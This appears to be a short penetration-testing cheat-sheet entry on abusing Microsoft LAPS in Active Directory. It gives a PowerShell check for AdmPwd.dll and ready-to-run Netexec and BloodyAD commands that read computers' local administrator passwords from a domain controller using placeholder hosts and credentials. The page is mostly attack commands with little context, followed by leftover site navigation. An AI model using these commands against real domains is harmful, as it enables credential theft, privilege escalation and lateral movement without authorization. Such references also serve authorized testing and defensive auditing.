LAPS

On a computer, if LAPS is in use, you can find AdmPwd.dll

powershell

dir "c:\Program Files\laps\cse\AdmPwd.dll"

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).

Netexec

bash

nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps

bash

nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps -O computer="us-d*"

BloodyAD

bash

bloodyAD --host DC_IP -d DOMAIN -u USER -p PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Enumeration

Lateral Movement

Kerberos

Wireguard

LAPS

Kerberos

LAPS ​

LAPS